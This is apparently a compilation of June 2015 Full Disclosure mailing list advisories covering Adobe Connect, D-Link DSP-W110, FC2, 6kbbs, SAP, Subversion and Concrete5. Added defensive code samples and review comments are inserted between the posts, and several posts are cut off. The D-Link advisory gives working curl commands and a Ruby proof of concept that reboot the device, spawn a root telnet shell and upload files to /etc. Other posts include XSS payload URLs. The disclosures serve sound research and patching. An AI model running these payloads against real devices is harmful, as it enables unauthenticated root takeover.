[FD] XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343 )

2015-06-11 Thread Stas Volfus
Advisory: Adobe Connect Reflected XSS
Author: Stas Volfus (Bugsec Information Security LTD)
Vendor URL: http://www.adobe.com/
Status: Vendor Notified


==
Vulnerability Description
==

Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS
(Cross Site Scripting).

The attack allows execution of arbitrary JavaScript in the context of
the user’s browser.

CVE id: CVE-2015-0343 was assigned for this issue.



==
PoC
==
The following URL demonstrates the vulnerability:
https://vulnerablewebsite.com/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=XSS Link



==
Disclosure Timeline
==

04-NOV-2014 - Vendor notified

01-DEC-2014 - CVE assigned

27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4.


==
References
==
http://www.adobe.com/il_en/products/adobeconnect.html
https://helpx.adobe.com/adobe-connect/release-note/connect-94-release-notes.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] D-Link DSP-W110 - multiple vulnerabilities

2015-06-11 Thread Peter Adkins
>> D-Link DSP-W110 - multiple vulnerabilities


Discovered by:

Peter Adkins 


Access:

Local network; unauthenticated access.


Tracking and identifiers:

CVE - None allocated.


Platforms / Firmware confirmed affected:

D-Link DSP-W110 (Rev A) - v1.05b01


Notes:

* There appears to be a number of references to both 'miiiCasa' as well as
'fitivision' throughout the firmware, which may indicate that these
vulnerabilities could be present in other devices not listed in this
document.

* A copy of this document, as well as the proof of concept below and a
more detailed write-up has been made available via GitHub:

 * https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110


Arbitrary command execution / SQL Injection


Patches made to lighttpd by the vendor expose the device to both SQL
injection and, more interestingly, arbitrary code execution. This is due to
the improper sanitization of data supplied by a client.

As the lighttpd service provides endpoints to be accessed without
authentication, it provides a vector for an attacker to execute arbitrary
commands on the device as the root user via HTTP call without authentication
credentials.

The root cause of this issue is that the contents of an HTTP Cookie, with
any name, is passed verbatim to a sprintf() call in order to form an SQL
query used to validate existing client sessions. By simply performing an
HTTP request against the device with a correctly formatted cookie set,
arbitrary SQL can be executed against the internal SQLite database.

Further to this issue, as this SQL query is passed to a popen() call in
order to execute the query, arbitrary commands are also able to be run on
the device as the root user.

This said, due to the length of the allocated buffer, the value of the
cookie cannot exceed 19 characters. However, as below, 19 characters is
exactly enough to pop a shell on the device.

  # Reboot the device.
  curl 192.168.1.3/ \
   --cookie "terribleness='\`reboot\`"

  # Spawn a root shell (telnet)
  curl 192.168.1.3/ \
   --cookie "terribleness=\`telnetd -l/bin/sh\`"


Arbitrary file upload


Patches made to lighttpd by the vendor expose the device to arbitrary file
upload attacks.

Unfortunately, the only 'filtering' on this resource appears to be a
sprintf() call which statically prefixes a submitted 'dev' argument with
'/www'. However, if an HTTP request is performed without a 'dev' argument
at all, the sprintf() call is never reached, and a fully-qualified path can
be provided in the 'path' parameter - bypassing the upload path restriction.

As a result of the above, this resource can be used to upload files to
any location on the filesystem of devices running vulnerable firmware
versions without authentication.

  # Upload arbitrary files to the device.
  echo 'Some String' > test.txt
  curl \
   -X POST \
   -i \
   -F name=@test.txt \
   --http1.0 \
   '192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'


Diagnostic Information


Patches made to lighttpd by the vendor of this device allow an attacker to
query the device, without authentication, for the following information:

 * Current WLAN SSIDs
 * Current WLAN channels
 * LAN and WAN MAC addressing
 * Current firmware version information
 * Hardware version information

Although not sensitive information, it may allow for identification of
devices running vulnerable firmware versions.

  # Information query.
  curl \
   192.168.1.3/mplist.txt


Ruby PoC


# DSP-W110-Lighttpd PoC.

require 'pp'
require 'optparse'
require 'restclient'

# Set defaults and parse command line arguments
options = {}

options[:addr] = "192.168.0.60"
options[:port] = 80

OptionParser.new do |option|

  option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
    options[:addr] = a
  end

  option.on("--port [PORT]", "Destination TCP port") do |p|
    options[:port] = p
  end

  option.parse!

end

# Define which actions we will be using.
actions = [
  {
    :name => "Get device information",
    :call => "txt_parser",
    :path => "mplist.txt",
  },
  {
    :name => "Snatch configuration",
    :call => "noop",
    :path => "HNAP1",
    :cookies => { :cookie => "`cp /etc/co* /www/`" }
  },
  {
    :name => "Fetch configuration",
    :call => "conf_writer",
    :path => "config.sqlite",
  },
  {
    :name => "Enable telnet (root)",
    :call => "noop",
    :path => "HNAP1",
    :cookies => { :cookie => "`telnetd -l/bin/sh`" }
  }
]

def noop(val)
  return
end

def txt_parser(txt)
  txt.split(/\r?\n/).each do |line|
    puts "#{line}"
  end
end

def conf_writer(txt)
  begin
    f = File.open('./config.sqlite', 'wb')
  rescue => e
    puts "[!] Failed to open config.sqlite for writing #{e.message}"
    return # without this, f is nil and f.write below raises NoMethodError
  end
  f.write(txt)
  f.close
  puts "[*] Configuration fetched into 'config.sqlite'"
end

# Iterate over all actions and attempt to execute.
url = "http://#{options[:addr]}:#{options[:port]}";

puts "[!
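A defender-side check for the three issues in this advisory, written as an added example (not the advisory's or D-Link's code): it parses raw HTTP requests and flags a cookie of any name whose value carries shell or SQL metacharacters, UploadFile requests that omit the 'dev' argument or point at an absolute 'path', and reads of mplist.txt. The sample requests, the metacharacter set and the finding labels are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Characters that have no place in a legitimate session cookie on this device;
# backticks and quotes are what turn a cookie value into SQL or shell syntax
# once it reaches the sprintf()/popen() path the advisory describes.
COOKIE_META = re.compile(r"[`'\";|&$()]")

# Constructed requests mirroring the advisory's curl calls, plus one benign request.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 192.168.1.3\r\nCookie: terribleness='`reboot`\r\n\r\n",
    "POST /web_cgi.cgi?&request=UploadFile&path=/etc/ HTTP/1.0\r\nHost: 192.168.1.3\r\n\r\n",
    "GET /mplist.txt HTTP/1.1\r\nHost: 192.168.1.3\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 192.168.1.3\r\nCookie: session=abcdef0123456789\r\n\r\n",
]


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def cookie_values(header: str) -> list:
    """Values of every cookie in the header; names are ignored because the
    advisory says a cookie of any name reaches the query builder."""
    values = []
    for pair in header.split(";"):
        pair = pair.strip()
        if pair:
            values.append(pair.partition("=")[2])
    return values


def findings(raw: str) -> list:
    """Labels for everything in one request that matches the advisory."""
    req = parse_request(raw)
    out = []
    if any(COOKIE_META.search(v) for v in cookie_values(req["headers"].get("cookie", ""))):
        out.append("cookie-metachar")
    url = urlsplit(req["target"])
    query = parse_qs(url.query, keep_blank_values=True)
    if url.path.endswith("/web_cgi.cgi") and query.get("request") == ["UploadFile"]:
        if "dev" not in query:
            out.append("upload-no-dev")          # the '/www' prefixing is skipped
        if any(p.startswith("/") for p in query.get("path", [])):
            out.append("upload-absolute-path")  # destination outside the web root
    if url.path.endswith("/mplist.txt"):
        out.append("device-info-read")
    return out


def scan(requests=SAMPLE_REQUESTS) -> dict:
    """Map request index to its findings, dropping clean requests."""
    result = {}
    for i, r in enumerate(requests):
        f = findings(r)
        if f:
            result[i] = f
    return result


if __name__ == "__main__":
    for idx, labels in scan().items():
        print(idx, ", ".join(labels))
```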

[FD] FC2 & Rakuten Online Websites Multiple XSS (Cross-site Scripting) and Open Redirect Cyber Vulnerabilities

2015-06-11 Thread Jing Wang
*FC2 & Rakuten Online Websites Multiple XSS (Cross-site Scripting) and Open
Redirect Cyber Vulnerabilities *




FC2 and Rakuten are the first and second top-ranking Japanese local online
websites. This post introduces several XSS (Cross-site Scripting) and Open
Redirect bugs in them.



The Alexa rank of fc2.com is 52 on February 18 2015 and the related rank in
Japan is 4. The Alexa rank of rakuten.co.jp is 64 on May 29 2015 and the
related rank in Japan is 7.




Discoverer and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing






*(1) FC2 XSS (cross site scripting) & Open Redirect*



*Domain:*
blog.fc2.com/


"FC2 (founded July 20, 1999) is a popular Japanese blogging host, the third
most popular video hosting service in Japan (after YouTube and Niconico),
and a web hosting company headquartered in Las Vegas, Nevada. It is the
sixth most popular website in Japan overall (as of January 2014). FC2 is an
abbreviation of "Fantastic Kupi-Kupi (クピクピ)". It is known to allow
controversial adult content such as pornography and hate speech (unlike
many of its competitors). The company uses rented office space for its
headquarters which it shares with many other U.S.-based businesses. It also
pays taxes in the United States. The physical servers are located in the
United States. However, it is believed that the majority of the company and
its users (including employees) are located within Japan" (Wikipedia)


The Alexa rank of fc2.com is 52 on February 18 2015. It is the top one
Japanese local website service.





*(1.1) FC2 fc2.com  Online Website URLs XSS (cross site
scripting) Vulnerabilities (All URLs Under Domain blog.fc2.com/tag
)*




*Vulnerability description:*

FC2 has a computer cyber security bug problem. It is vulnerable to XSS
attacks. Here is the description of XSS: "Hackers are constantly
experimenting with a wide repertoire of hacking techniques to compromise
websites and web applications and make off with a treasure trove of
sensitive data including credit card numbers, social security numbers and
even medical records. Cross-site Scripting (also known as XSS or CSS) is
generally believed to be one of the most common application layer hacking
techniques Cross-site Scripting allows an attacker to embed malicious
JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic
page to fool the user, executing the script on his machine in order to
gather data. The use of XSS might compromise private information,
manipulate or steal cookies, create requests that can be mistaken for those
of a valid user, or execute malicious code on the end-user systems. The
data is usually formatted as a hyperlink containing malicious content and
which is distributed over any possible means on the internet." (Acunetix)




The programming code flaw occurs in the filenames of fc2 URLs. Fc2 only filters
part of the filenames in the URLs. Almost all URLs under the domain
blog.fc2.com/tag are affected, i.e.
http://blog.fc2.com/tag/drug/
http://blog.fc2.com/tag//アメリカ/
http://blog.fc2.com/tag/tag/翻訳
http://blog.fc2.com/tag//>レシピブログに参加中♪



The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.02) in Ubuntu (14.04) and IE (9.0.15) in Windows 7.


POC Code:
http://blog.fc2.com/tag/drug//";>
http://blog.fc2.com/tag//アメリカ//";>
http://blog.fc2.com/tag/tag/翻訳//";>
http://blog.fc2.com/tag//>レシピブログに参加中//">







*Poc Video:*
https://www.youtube.com/watch?v=jQ8dLbno6JQ


*Blog Detail:*
http://tetraph.com/security/xss-vulnerability/fc2-blog-xss/
http://securityrelated.blogspot.com/2015/06/fc2-fc2com-online-website-urls-xss.html







*(1.2) FC2 Online Web Service Open Redirect (Unvalidated Redirects and
Forwards) Cyber Security Vulnerabilities*



*(1.2.1) Vulnerability Description:*

FC2 online web service has a computer cyber security bug problem. It can be
exploited by Open Redirect (Unvalidated Redirects and Forwards) attacks.
Here is the description of Open Redirect: "An open redirect is an
application that takes a parameter and redirects a user to the parameter
value without any validation. This vulnerability is used in phishing
attacks to get users to visit malicious sites without realizing it." One
consequence of it is Phishing. (OWASP)


The program code flaw can be attacked without user login. Tests were
performed on Microsoft IE (9 9.0.8112.16421) of Windows 7, Mozilla Firefox
(37.0.2) & Google Chromium 42.0.2311 (64-bit) of Ubuntu (14.04.2), Apple
Safari 6.1.6 of Mac OS X v10.9 Mavericks.


In fact, during the test, it is not hard to find URL Redirection bugs in
FC2. Maybe fc2.com pays little attention to mitigating these vulnerabilities.
These bugs were found by using URFDS.





*(1.2.2)* Use one of webpages for the following tests. The webpage address
is "http://security

[FD] 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities

2015-06-11 Thread Jing Wang
*6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities*


Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: June 08, 2015
Latest Update: June 10, 2015
Vulnerability Type: Inadequate Encryption Strength [CWE-326]
CVE Reference: *
CVSS Severity (version 2.0):
Discoverer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)






*Recommendation Details:*


*(1) Vendor & Product Description:*


Vendor:
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be obtained from here,
http://www.6kbbs.com/download.html




*Product Introduction Overview:*
"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions. Forum Technical realization (a) interface : using XHTML + CSS
structure, so the structure of the page , easy to modify the interface ;
save the transmission static page code , greatly reducing the amount of
data transmitted over the network ; improve the interface scalability ,
more in line with WEB standards, support Internet Explorer, FireFox, Opera
and other major browsers. (b) Program : The ASP + ACCESS mature technology
, the installation process is extremely simple , the environment is also
very common."


"(1) PHP version : (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b)
Currently ( July 2010 ) is still in the testing phase , 6kbbs V8.0 is the
latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent
community forum process . The program is simple but not simple ; fast ,
small ; interface generous and good scalability ; functional and practical
. pursue superiority , good interface , practical functions of choice for
subscribers."





*(2) Vulnerability Details:*
6kbbs web application has a computer security problem. It can be exploited
by weak encryption attacks. The software stores or transmits sensitive data
using an encryption scheme that is theoretically sound, but is not strong
enough for the level of protection required. A weak encryption scheme can
be subjected to brute force attacks that have a reasonable chance of
succeeding using current attack methods and resources.


Several 0-day web bugs in 6kbbs products have been found by other
bug hunters before. 6kbbs has patched some of them. "The Full
Disclosure mailing list is a public forum for detailed discussion of
vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!"
A great many web security issues have been published here.




Source Code:
    row_select_one("users","username='{$username}'");
    if(!empty($extrow) && !empty($extrow['salt'])){

        if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){
            $row=$extrow;
            $new_row["userpass"]=$userpass_encrypt;
            $new_row["salt"]="";

            $db->row_update("users",$new_row,"id={$extrow['id']}");
        }
    }
}
?>



Source Code From:
http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16


We can see that the "userpass" stored in the cookie was encrypted using the
"$userpass" user password directly. And there is no "HttpOnly" attribute at
all. Since md5 is used for the encryption, it is easy for hackers to break
the encrypted message.


"The MD5 message-digest cryptography algorithm is a widely used
cryptographic hash function producing a 128-bit (16-byte) hash value,
typically expressed in text format as a 32 digit hexadecimal number. Papers
about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile,
researchers focusing on it spread in Computer Science, Computer
Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety
of cryptographic applications, and is also commonly used to verify data
integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier
hash function, MD4. The source code in RFC 1321 contains a "by attribution"
RSA license." (Wikipedia)








*References:*
http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/
http://securityrelated.blogspot.com/2015/06/6kbbs-v80-
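An added example (not 6kbbs code) contrasting the md5(password)-derived cookie described above with a per-login random session token bound to the user id by an HMAC and sent with the HttpOnly attribute the post says is missing. The server key, user id and password below are constructed values.

```python
import hashlib
import hmac
import secrets

# Constructed key; a real deployment loads this from configuration and rotates it.
SERVER_KEY = b"example-server-key-rotate-me"


def legacy_cookie(password: str) -> str:
    """The pattern the post describes: a cookie derived from the password via md5.
    It is deterministic, so it never changes, survives logout, and anyone who
    can guess the password can reproduce it offline."""
    return hashlib.md5(password.encode()).hexdigest()


def make_session_cookie(user_id: int, key: bytes = SERVER_KEY) -> str:
    """uid.nonce.mac: a fresh random nonce per login, tied to the user id by an
    HMAC so neither part can be altered without the server key."""
    nonce = secrets.token_hex(16)
    payload = f"{user_id}.{nonce}".encode()
    mac = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return f"{user_id}.{nonce}.{mac}"


def verify_session_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the user id if the cookie is well formed and its MAC checks out,
    otherwise None. Comparison is constant-time."""
    parts = cookie.split(".")
    if len(parts) != 3 or not parts[0].isdigit():
        return None
    uid, nonce, mac = parts
    expected = hmac.new(key, f"{uid}.{nonce}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return int(uid)


def set_cookie_header(cookie: str) -> str:
    """Set-Cookie line carrying the attributes the legacy scheme leaves out."""
    return f"Set-Cookie: session={cookie}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print("legacy cookie is static:", legacy_cookie("hunter2") == legacy_cookie("hunter2"))
    c = make_session_cookie(7)
    print("new cookie differs per login:", c != make_session_cookie(7))
    print("verifies to user:", verify_session_cookie(c))
    print("tampered uid rejected:", verify_session_cookie("8." + c.split(".", 1)[1]))
    print(set_cookie_header(c))
```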

[FD] SAP Security Notes June 2015

2015-06-11 Thread Darya Maenkova
SAP has released the monthly critical patch update 
for June 2015. This patch update closes a lot of vulnerabilities in SAP 
products. The most popular vulnerability is Missing Authorization Check. 
This month, three critical vulnerabilities found by ERPScan researchers 
Vahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva were closed.


*Issues that were patched with the help of ERPScan*

Below are the details of SAP vulnerabilities that were found by ERPScan
researchers.


 * An XML eXternal Entity vulnerability in SAP Mobile Platform
   on-premise (CVSS Base Score: 5.5). Update is available in SAP Security
   Note 2159601. An attacker can use XML eXternal Entities to send specially
   crafted unauthorized XML requests, which will be processed by the XML
   parser. The attacker will get unauthorized access to the OS file system.
 * A Hardcoded Credentials vulnerability in SAP Cross-System Tools
   (CVSS Base Score: 3.6). Update is available in SAP Security Note 2059659.
   An attacker can use hardcoded credentials for unauthorized access and
   perform various actions in the system. In addition, it is likely that the
   code will be implemented as a backdoor into the system.
 * A Hardcoded Credentials vulnerability in SAP Data Transfer Workbench
   (CVSS Base Score: 2.1). Update is available in SAP Security Note 2057982.
   An attacker can use the hardcoded credentials for unauthorized access and
   perform various actions in the system. In addition, it is likely that the
   code will be implemented as a backdoor into the system.


*The most critical issues found by other researchers*

Some of our readers and clients asked us to categorize the most critical 
SAP vulnerabilities to patch them first. Companies providing SAP 
Security Audit, SAP Security Assessment, or SAP Penetration Testing 
services can include these vulnerabilities in their checklists. The most 
critical vulnerabilities of this update can be patched by the following 
SAP Security Notes:


 * 2151237: SAP GUI for Windows has a Buffer Overflow vulnerability (CVSS
   Base Score: 9.3). An attacker can use Buffer Overflow for injecting
   specially crafted code into working memory, which will be executed
   by the vulnerable application under the privileges of that
   application. This can lead to the attacker taking complete control
   over the application, denial of service, command execution, and
   other attacks. In case of command execution, an attacker can obtain
   critical technical and business-related information stored in the
   vulnerable SAP system or escalate their own privileges. As for
   denial of service, the process of the vulnerable component may be
   terminated. For this time, nobody will be able to use this service,
   which negatively influences business processes, system downtime,
   and, consequently, business reputation. It is recommended to install
   this SAP Security Note to prevent risks.
 * 2129609: SAP EP JDBC Connector has an SQL Injection vulnerability (CVSS
   Base Score: 6.5). An attacker can use SQL Injections with the help of
   specially crafted SQL queries. They can read and modify sensitive
   information from a database, execute administrative operations in a
   database, destroy data or make it unavailable. In some cases, an
   attacker can access system data or execute OS commands. It is
   recommended to install this SAP Security Note to prevent risks.
 * 1997734: SAP RFC runtime has a Missing Authorization Check vulnerability
   (CVSS Base Score: 6.0). An attacker can use Missing Authorization Checks
   to access a service without any authorization procedures and use
   service functionality that has restricted access. This can lead to
   information disclosure, privilege escalation, and other attacks. It
   is recommended to install this SAP Security Note to prevent risks.
 * 2163306: SAP CommonCryptoLib and SAPCRYPTOLIB are vulnerable to FREAK
   (CVE-2015-0204, CVSS Base Score: 5.0). It allows an attacker to
   intercept HTTPS connections between vulnerable clients and servers
   and force them to use weakened encryption, which the attacker can
   break to steal or manipulate sensitive data. All the attacks on this
   page assume a network adversary (i.e. a man-in-the-middle) to tamper
   with TLS handshake messages. The typical scenario to mount such
   attacks is by tampering with the Domain Name System (DNS), for
   example via DNS rebinding or domain name seizure. This attack
   targets a class of deliberately weak export cipher suites. It is
   recommended to install this SAP Security

[FD] Apache vulnerability program faulting module ntdll.dll

2015-06-11 Thread Bruno Luiz
Subversion HTTP servers allow spoofing svn:author property values
  for new revisions.

Summary:


  Subversion's mod_dav_svn server allows setting arbitrary svn:author
  property values when committing new revisions.  This can be accomplished
  using a specially crafted sequence of requests.  An evil-doer can fake
  svn:author values on his commits.  However, as authorization rules are
  applied to the evil-doer's true username, forged svn:author values can
  only happen on commits that touch the paths the evil-doer has write
  access to.

  Doing so does not grant any additional access and does not circumvent the
  standard Apache authentication or authorization mechanisms.  Still, an
  ability to spoof svn:author property values can impact data integrity in
  environments that rely on these values.

  There are no known instances of the problem being exploited in the wild,
  but an exploit has been tested.

Known vulnerable:

  Subversion HTTPD servers 1.5.0 through 1.7.19 (inclusive)
  Subversion HTTPD servers 1.8.0 through 1.8.11 (inclusive)

Known fixed:


  Subversion 1.7.20
  Subversion 1.8.13
  svnserve (any version) is not vulnerable

  Subversion 1.8.12 was not publicly released.

Details:


  The Subversion http://-based protocol used for communicating with
  a Subversion mod_dav_svn server has two versions, v1 and v2.  The v2
  protocol was added in Subversion 1.7.0, but the server allows using both
  protocol versions for compatibility reasons.  When a commit happens, the
  client sends a sequence of requests (POST, PUT, MERGE, etc.) that depend
  on the negotiated protocol version.

  Usually, a server uses the name of the authenticated user as the svn:author
  value for a new revision.  However, with a specially handcrafted v1 request
  sequence, a client can instruct the server to use the svn:author property
  that she/he provided.  In this case, the server will use an arbitrary value
  coming from the client instead of the svn:author value originating from
  the authentication mechanism.

Severity:

  CVSSv2 Base Score: 3.5
  CVSSv2 Base Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N

  We consider this to be a medium risk vulnerability.

  An attacker needs to have commit access to the repository to exploit the
  vulnerability.  The ability to spoof svn:author property values can impact
  data integrity in environments that expect the values to denote the actual
  commit author.  The real ID of the author could still be determined using
  server access logs.  However, it is also possible that a spoofed change
  could go in unnoticed.

  Subversion's repository hooks might see the real ID of the author or the
  forged value, depending on the hook type and the hook contents:

  - A start-commit hook will see the real username in the USER argument
  - A start-commit hook will see the real username when performing
    'svnlook propget --revprop -t TXN_NAME'
  - A pre-commit hook will see the forged username when performing
    'svnlook propget --revprop -t TXN_NAME'
  - A post-commit hook will see the forged username when performing
    'svnlook propget --revprop -r REV'

  Unfortunately, no special configuration is required and all mod_dav_svn
  servers are vulnerable.

Recommendations:


  We recommend all users to upgrade to Subversion 1.8.13.  Users of
  Subversion 1.7.x or 1.8.x who are unable to upgrade may apply the
  included patch.

  New Subversion packages can be found at:
  http://subversion.apache.org/packages.html

  No workaround is available.

References:

  CVE-2015-0251  (Subversion)

Reported by:


  Bruno Luiz, d4t

Patches:


  Patch against 1.7.19:
[[[
Index: subversion/mod_dav_svn/deadprops.c
===
--- subversion/mod_dav_svn/deadprops.c(revision 1660122)
+++ subversion/mod_dav_svn/deadprops.c(working copy)
@@ -160,6 +160,23 @@ get_value(dav_db *db, const dav_prop_name *name, s
}


+static svn_error_t *
+change_txn_prop(svn_fs_txn_t *txn,
+const char *propname,
+const svn_string_t *value,
+apr_pool_t *scratch_pool)
+{
+  if (strcmp(propname, SVN_PROP_REVISION_AUTHOR) == 0)
+return svn_error_create(SVN_ERR_RA_DAV_REQUEST_FAILED, NULL,
+"Attempted to modify 'svn:author' property "
+"on a transaction");
+
+  SVN_ERR(svn_repos_fs_change_txn_prop(txn, propname, value, scratch_pool));
+
+  return SVN_NO_ERROR;
+}
+
+
static dav_error *
save_value(dav_db *db, const dav_prop_name *name,
const svn_string_t *const *old_value_p,
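Review bot: change_txn_prop() carries no comment explaining why svn:author is refused; add one above the function stating that the author of a commit is taken from the authenticated user and must never be supplied by the client, so a later reader does not treat the rejection as a regression. The strcmp() against SVN_PROP_REVISION_AUTHOR is an exact match, which is right for property names, and wrapping svn_repos_fs_change_txn_prop() in SVN_ERR() leaves error propagation unchanged for every other property.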
@@ -210,9 +227,8 @@ save_value(dav_db *db, const dav_prop_name *name,
 {
   if (db->resource->working)
 {
-  serr = svn_repos_fs_change_txn_prop(resource->info->root.txn,
-  propname, value,
-
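Review bot: the hunk ends after the removed svn_repos_fs_change_txn_prop() lines, so the replacement under `if (db->resource->working)` is not visible here; the call at this site has to go through the new change_txn_prop() for the svn:author check to take effect, and since the patch is cut off in this message it should be compared against the released 1.7.20/1.8.13 fix before being applied.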

[FD] [KIS-2015-03] Concrete5 <= 5.7.4 (Access.php) SQL Injection Vulnerability

2015-06-11 Thread Egidio Romano
---
Concrete5 <= 5.7.4 (Access.php) SQL Injection Vulnerability
---


[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1, 5.7.4, and probably other versions.


[-] Vulnerability Description:

The vulnerable code is located in /concrete/src/Permission/Access/Access.php:

168.    protected function buildAssignmentFilterString($accessType, $filterEntities)
169.    {
170.        $peIDs = '';
171.        $filters = array();
172.        if (count($filterEntities) > 0) {
173.            foreach ($filterEntities as $ent) {
174.                $filters[] = $ent->getAccessEntityID();
175.            }
176.            $peIDs .= 'and peID in (' . implode($filters, ',') . ')';
177.        }
178.        if ($accessType == 0) {
179.            $accessType = '';
180.        } else {
181.            $accessType = ' and accessType = ' . $accessType;
182.        }

The Access::buildAssignmentFilterString() method uses its $accessType parameter
to construct a SQL query without a proper validation at line 181. This can be
exploited to inject and execute arbitrary SQL commands. Successful exploitation
of this vulnerability requires an account with privileges to edit page
permissions.


[-] Solution:

Update to version 5.7.4.1 or later.


[-] Disclosure Timeline:

[05/05/2015] - Vulnerability details sent through HackerOne
[12/05/2015] - Vendor said a patch has been committed and will be available in 
the next version
[12/05/2015] - Version 5.7.4.1 released along with the patch for this 
vulnerability
[11/06/2015] - Vulnerability publicly disclosed on HackerOne
[11/06/2014] - CVE number requested
[11/06/2014] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has not 
assigned a name to this vulnerability yet.


[-] Credits:

Vulnerability discovered by Egidio Romano of Minded Security.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2015-03


[-] Other References:

https://hackerone.com/reports/59664

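The buildAssignmentFilterString() pattern rebuilt in Python against an in-memory SQLite table, as an added example (not Concrete5 code): the unchecked concatenation at line 181 beside a form that coerces $accessType to an integer and binds every value as a parameter. The table name, columns and rows are constructed for the example.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed table standing in for the permission-assignment table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE PermissionAccessList (peID INTEGER, accessType INTEGER)")
    con.executemany("INSERT INTO PermissionAccessList VALUES (?, ?)",
                    [(1, 10), (2, 10), (3, 5), (4, 0)])
    return con


def vulnerable_filter(access_type, entity_ids):
    """Mirrors lines 172-181: entity ids come from objects (ints), but
    $accessType is concatenated into the SQL text exactly as received."""
    sql = "SELECT COUNT(*) FROM PermissionAccessList WHERE 1=1"
    if entity_ids:
        sql += " AND peID IN (" + ",".join(str(int(i)) for i in entity_ids) + ")"
    if access_type not in (0, "0"):                        # PHP's $accessType == 0
        sql += " AND accessType = " + str(access_type)    # line 181
    return sql


def safe_filter(access_type, entity_ids):
    """Hardened form: $accessType must be an integer and is bound as a
    parameter, so SQL syntax in the value never reaches the parser."""
    access_type = int(access_type)   # ValueError for anything that is not a number
    sql = "SELECT COUNT(*) FROM PermissionAccessList WHERE 1=1"
    params = []
    if entity_ids:
        ids = [int(i) for i in entity_ids]
        sql += " AND peID IN (" + ",".join("?" * len(ids)) + ")"
        params.extend(ids)
    if access_type != 0:
        sql += " AND accessType = ?"
        params.append(access_type)
    return sql, params


def count_vulnerable(con, access_type, entity_ids):
    return con.execute(vulnerable_filter(access_type, entity_ids)).fetchone()[0]


def count_safe(con, access_type, entity_ids):
    sql, params = safe_filter(access_type, entity_ids)
    return con.execute(sql, params).fetchone()[0]


if __name__ == "__main__":
    con = setup_db()
    ids = [1, 2, 3]
    print(count_vulnerable(con, 10, ids))            # 2 with an honest value
    print(count_vulnerable(con, "10 OR 1=1", ids))   # 4: the tautology widens the filter
    print(count_safe(con, 10, ids))                  # 2
    try:
        count_safe(con, "10 OR 1=1", ids)
    except ValueError as exc:
        print("rejected:", exc)
```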


[FD] [KIS-2015-02] Concrete5 <= 5.7.3.1 Multiple Reflected Cross-Site Scripting Vulnerabilities

2015-06-11 Thread Egidio Romano

Concrete5 <= 5.7.3.1 Multiple Reflected Cross-Site Scripting Vulnerabilities



[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1 and probably other versions.


[-] Vulnerabilities Description:

1) The vulnerable code is located in /concrete/views/panels/details/page/versions.php:

5.  tabs($tabs);
10. foreach($_REQUEST['cvID'] as $cvID) { ?>
11. 
12. 

User input passed through the "cvID" and "cID" request parameters is not
properly sanitized before being used to generate HTML output at lines 6 and
13. This can be exploited to conduct reflected Cross-Site Scripting (XSS)
attacks.

2) The vulnerable code is located in /concrete/src/Form/Service/Widget/UserSelector.php:

17.     public function selectUser($fieldName, $uID = false, $javascriptFunc = 'ccm_triggerSelectUser') {
18.         $selectedUID = 0;
